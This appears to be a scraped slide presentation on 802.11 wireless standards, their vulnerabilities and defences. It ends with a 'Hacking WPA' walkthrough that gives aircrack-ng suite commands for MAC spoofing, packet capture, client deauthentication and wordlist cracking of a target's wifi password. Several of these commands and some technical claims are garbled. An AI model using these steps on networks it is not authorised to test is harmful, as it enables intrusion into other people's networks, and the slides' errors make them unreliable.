310 likes | 459 Views
its about wireless network vulnerabilities as well as hacking for wifi password using airmon, airodump,aireplay and aircrack
E N D
What's IEEE 802.11? • Wireless network security is IEEE 802.11 • which is a set of standards for radio communications used in wireless local area networks, or WLANs. • IEEE is an organization composed of engineers, scientists and students that specialize in creating standards for the computer and electronics industry in order to ensure smooth operability and compatibility. The organization uses a number system to represent the standards it comes up with for different technologies. • IEEE uses the number 802 to categorize standards for local and wide area networks, while the number 11 narrows that down to wireless area networks.
Versions of 802.11 protocols • 802.11a • 802.11b • 802.11g
802.11a • 802.11a has a superior 54-Mbps speed. (802.11a was the fastest Wi-Fi protocol available before 802.11g was released) 802.11a operates in the 5 GHz spectrum and has 12 non-overlapping channels. As a result of this higher frequency, 802.11a has a much harder time penetrating through obstacles, such as walls and other objects. This results in a range much lower than 802.11b. • it is less prone to interference from other 5 GHz devices because there are fewer 802.11a and 5 GHz cordless devices deployed in the real world to compete with. • 802.11a makes an excellent choice for building-to-building and backhaul solutions where line of sight is available.Also, 802.11 offers 11 non-overlapping channels.
Cont’d • Advantages • Relatively fast speed; more non-overlapping channels than 802.11b/g; 5 GHz spectrum is less crowded. • Disadvantages • More expensive and shorter range.
802.11b • 802.11b was widely regarded as the most popular form of Wi-Fi. It utilizes frequencies in the 2.4 GHz range (2.400–2.485GHz) and has 11 channels. However, only three of these channels are truly non-overlapping. • The range (distance) for 802.11b can vary widely, but each access point (with default antennas) typically covers a few hundred feet (indoors) or a few thousand feet (outdoors). With specialized, external antennas, this range can be greatly increased. 802.11b operates in the Industrial, Scientific, and Medical (ISM) unlicensed spectrum. • The top speed for 802.11b is 11 Mbps, but it will auto-negotiate down to rates of 5.5, 2, and 1 Mbps as the signal strength deteriorates.These speeds include a relatively high amount of “overhead,” as required by the protocol to operate.
Cont’d • However the level of Wi-Fi congestion found in any major metropolitan area is raising the RF noise floor and rendering many long distance links unusable. advantages • Most popular and widely available; least expensive; good coverage Disadvantage • Relatively slow speed; interference from other 2.4 GHz devices; only three non-overlapping channels
802.11g • To keep up with the 54-Mbps speed claims of 802.11a, the 802.11g protocol was ratified in 2003. • This protocol took the OFDM modulation technique of 802.11a and applied it to the 2.4 GHz spectrum of 802.11b. Because it operated in 2.4 GHz, it was possible to remain backwards-compatible with 802.11b equipment. 802.11g radios support both OFDM and DSSS modulation techniques. • Upside: Relatively fast speed; compatible with 802.11b • Downside: Interference from other 2.4 GHz devices; only three non-overlapping channels
Ad-Hoc and Infrastructure Modes • When architecting an 802.11 network, there are two modes in which you can operate: Ad-Hoc(independent basic infrastructure mode) and Infrastructure. • In Ad-Hoc all devices are peer to peer with no access points. They communicate to each other. • In infrastructure mode, an AP is connected to a wired infrastructure (such as Ethernet) and all of the wireless devices communicate with the AP. Even if two wireless devices are located right next to each other, all communication between the devices occurs through an AP.
Cont’d • collection of wireless devices connected to an AP is referred to as a Basic Service Set (BSS). If two or more BSSs are connected together using a “Distribution System” (such as wired Ethernet), the collection of BSSs is referred to as an Extended Service Set (ESS).
Vulnerabilities and Attack Methods • Human Error • Rogue Access Points- it is easy for even a novice to acquire equipment and set up a wireless network. If this is done from within another network, it creates what is known as a subnet, which can create back doors to its parent. There are many easily overlooked mistakes that can be made in configuring a wireless network, many of which novice users will overlook. • Warchalking- Using a fairly universal hobo sign language, individuals mark structures that have hotspots associated with them. In many cases these symbols incorporate much information about each node and the type of security currently being implemented. A modern version of HOBO.
ifconfig | grep wlan0 MAC Address Spoofing • Media Access Control (MAC) addresses [4] act as personal identification numbers for verifying the identity of authorized clients on wireless networks. However, existing encryption standards are not foolproof. A hacker can pick off authorized MAC addresses and steal bandwidth, corrupt or download files, and wreak havoc on an entire network. • ifconfig | grepwlan0 • Then you can use macchanger utility to change your mac address into the legitimate. • Softwares such as Kismet or ethereal can capture the mac address of an authorizeduser then hackers can change their macs into a real MAC address.
Now the hacker can connect to the wireless LAN and bypass any MAC address filtering. Netstumbler can also be used with a MAC spoofing utility or MAC address modifying utility such as SMAC to achieve the same results.
Man-In-The-Middle Attacks • The key concept behind a MITM attack is exactly as it sounds, one entity with malicious intent intercepts a message between two communicating entities. The hijacker can then send the message onto the receiver as if it had never been delayed, and even alter the message's content. • The message could be intercepted, altered and sent onto the recipient with fraudulent information. • The message could be blocked and prevented from proceeding any further. • The message could simply be read and sent on its way without the recipient's knowledge.
VPNs • IPSec is the de facto standard for VPN's over the Internet. IPSec defines the way secure data packets are structured through its three major components: the Authentication Header (AH), the Encapsulating Security Payload (ESP), and Internet Key Exchange. AH is responsible for verifying that packets have not been altered between the sender and receiver. • Comon VPN protocols include : • IPSec, ip security • PPTP(point to point tunneling protocol) • GRE(Generic routing encapsulation) • L2TP(Layer two tunneling protocol)
Types of VPNS • network-to-network, host-to-network, and host-to-host. • VPNs are cost-effective way of connecting remote nodes or sites. Alternatives to VPNs, such as dedicated, leased lines or deployment of a Remote Access Server are much more expensive.
defense • There are different methods for defending your network • WEP • MAC address blocking • Ditch defaults • Beacon intervals • Access lists • Controlling reset • Disable DHCP • Network auditing and intrusion detection.airdefecnce, wisentryairmanet, Nai sniffer…… WIDZ, AirIDS, Kismet,Snort
SNORT-open source intrusion detection system • Kismet..Can detect suspicious hosts such as clients running dictionary attacks and airack • HotSpotdefence Kit…monitors WMAC address, ESSID and other indicators that have been picked up by rouge AP like sudden flunctuation in signal strength.
WEP • Wired equivalency algorithm-uses the stream cipher RC4 for confidentiality,and the CRC-32 checksum for integrity. • Two methods of authentication can be used with WEP: Open System authentication and Shared Key authentication. • The client sends an authentication request to the Access Point. • The Access Point replies with a clear-text challenge. • The client encrypts the challenge-text using the configured WEP key and sends it back in another authentication request. • The Access Point decrypts the response. If this matches the challenge text, the Access Point sends back a positive reply.
WPA • Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. • It uses TKIP (Temporal Key Integrity Protocol) The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key for each packet. Used by WPA. This makes it more secure.
Hacking WPA • Find out the name of your wireless adapter. • You us ifconfig command on kal
Enable monitor mode • we use airmon-ng to  create a virtual interface called mon. Just type: • Airmon-ng start wlan0
Kill any processes airmon raises a flag for • You kill using a process identifier and the kill command; • Kill 833 • In some situations its recommended you change your mac Address • You can do that using • Macchnager –n 00:11:22:33:44:55 • Before you do this make sure you wlan0 is down using ifconfig command • Ifconfig wlan0 down • Then bring it back up • Ifconfig wlan0 up
Start capturing packets • we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack. • Airodump-ng wlan0mon • Control+c • Airodump-ng –c 1 –w WPA2 –bssid1d:23:34:45:t6:5y –ivs wlan0mon • Check for the station whether it connects • Aireplay –ng -0 1 –e Or • Aireplay-ng –ignore-negative-one -0 1 –a bssid wlan0mon
bruteforce • We copynmap wordlist from filesystem-USR-share-wordlist-NMAP and copy it to home • Aircrack-ng –w /root/nmap.lst WPA2 -01.ivs
Another method is storing capture packets in a file • airodump-ng mon0 –write name_of_file
References • WarDriving, http://www.worldwidewardrive.org • Buerke et al Wireless Security Attacks and Defenses • Wagner, Robert, "Address Resolution Protocol Spoofing and Man-in-the-Middle Attacks", SANS Institute • http://www.webopedia.com/TERM/D/DoS_attack.html - Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. • Cisco Systems, Inc. "A Comprehensive Review of 802.11 Wireless LAN Security and the Cisco Wireless Security Suite", http://www.cisco.com/warp/public/cc/pd/witc/ao1200ap/prodlit/wswpf_wp.pdf, 2002.
References continued • Michael Collins(2014) Network Security Through Data Analysis. Tokyo • Andrew A.et al.(2014) WI-Foo secrets of wireless hacking • Lee Barken et al (2008) WIRELESS HACKING Projects for Wi-Fi Enthusiasts